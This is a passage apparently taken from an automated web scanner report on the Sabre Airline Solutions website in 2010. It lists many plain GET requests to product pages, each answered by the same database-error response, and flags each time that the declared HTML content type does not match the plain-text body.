GET /home/products_services/product/sabre_airvision_schedule_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322790; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_fares_manager%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_load_manager%2F%22%3Bi%3A2%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Fagent_sales_report%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:00:45 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_airvision_slot_manager_iata HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322786; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_codeshare_manager%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:03:51 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_emd_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322833; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A1%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A2%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A4%3Bs%3A55%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_plan_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:29:55 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_gds_display_analysis HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322813; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_network_manager%2F%22%3Bi%3A1%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A2%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A3%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:27:58 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_qik_analysis_system HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322810; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_in-flight%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A3%3Bs%3A64%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_flight%2F%22%3Bi%3A4%3Bs%3A32%3A%22%2Fproducts_services%2Fweb_services%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:03:20 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_reaccommodation_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322881; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A1%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_manager%2F%22%3Bi%3A2%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_planner%2F%22%3Bi%3A3%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A4%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:32:28 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabresonic_check-in HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322881; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A1%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_manager%2F%22%3Bi%3A2%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_planner%2F%22%3Bi%3A3%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A4%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:32:31 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabresonic_inventory HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322889; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fsabre_emd_manager%2F%22%3Bi%3A1%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A3%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:32:57 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabresonic_sell HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322881; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A54%3A%22%2Fproducts_services%2Fproduct%2Fsabre_gds_display_analysis%2F%22%3Bi%3A1%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_network_manager%2F%22%3Bi%3A2%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A3%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A4%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:33:08 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabresonic_web HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322886; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A80%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3Bi%3A1%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_revenue_manager%2F%22%3Bi%3A2%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airport_data_intelligence%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:33:11 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/web_services HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322903; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A1%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A2%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_codeshare_manager%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A4%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:33:11 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product_index/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322214; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A1%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_planner%2F%22%3Bi%3A4%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fmultitask_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:27:11 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/sabre_airvision_fares_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_fares_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322575; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 04:21:01 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/sabre_airvision_network_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_network_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322572; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 04:16:13 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/sabre_airvision_profit_essentials HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_profit_essentials/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322572; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 04:16:20 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/sabre_airvision_profit_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_profit_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322572; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 04:16:28 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/sabre_airvision_schedule_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_schedule_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322572; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 04:20:45 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/sabre_airvision_slot_manager_iata HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_slot_manager_iata/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322572; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 04:20:48 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
